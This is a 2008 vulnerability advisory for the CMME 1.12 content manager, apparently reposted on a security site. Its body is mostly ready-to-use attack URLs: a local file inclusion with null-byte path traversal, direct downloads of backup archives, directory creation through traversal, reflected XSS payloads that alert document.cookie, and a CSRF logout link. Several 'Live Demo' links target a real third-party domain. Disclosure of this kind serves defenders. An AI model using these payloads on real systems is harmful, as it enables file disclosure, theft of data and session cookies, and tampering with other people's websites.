CMME 1.12 (LFI/XSS/CSRF/Backup/MkDir) Multiple Vulnerabilities

2008-09-06 / 2008-09-07
Credit: SirGod
Risk: Medium
Local: No
Remote: Yes

################################################################################################################## [+] CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities [+] Discovered By SirGod [+] www.mortal-team.org [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz ################################################################################################################## [+] Local File Inclusion Note : magic_quotes_gpc must be off. Example : http://localhost/index.php?page=weblog&env=[Local File]%00 PoC : http://localhost/index.php?page=weblog&env=../../../autoexec.bat%00 [+] Download Backup Example 1: http://localhost/backup/[Backup Name].zip PoC 1: http://localhost/backup/cmme_data.zip Live Demo 1: http://cmme.oesterholt.net/backup/cmme_data.zip Example 2: http://localhost/backup/[Backup Name].zip PoC 2: http://localhost/backup/cmme_cmme.zip Live Demo 2: http://cmme.oesterholt.net/backup/cmme_cmme.zip [+] Make Directory You can make multiple directories in website root folder. Example 1: http://localhost/admin.php?action=login&page=home&script=index.php&env=[Directory] PoC 1: http://localhost/admin.php?action=login&page=home&script=index.php&env=!!!Owned!!! Or you can make dir in previous directory,etc. Example 2: http://localhost/admin.php?action=login&page=home&script=index.php&env=../[Directory] PoC 2: http://localhost/admin.php?action=login&page=home&script=index.php&env=../!!!Owned!!! [+] Cross Site Scripting Example 1: http://localhost/statistics.php?action=hstat_year&page=[XSS}&env=data PoC 1: http://localhost/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data Live Demo 1: http://cmme.oesterholt.net/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data Example 2: http://localhost/statistics.php?action=hstat_year&year=[XSS]&env=data PoC 2: http://localhost/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data Live Demo 2: http://cmme.oesterholt.net/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data [+] Cross Site Request Forgery If an logged in user with administrator privileges clicks the following link he will be logged out. http://localhost/admin.php?action=logout&page=home&env=data ##################################################################################################################

Referencje:

http://xforce.iss.net/xforce/xfdb/44685
http://www.securityfocus.com/bid/30854
http://www.milw0rm.com/exploits/6313
http://secunia.com/advisories/31599


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top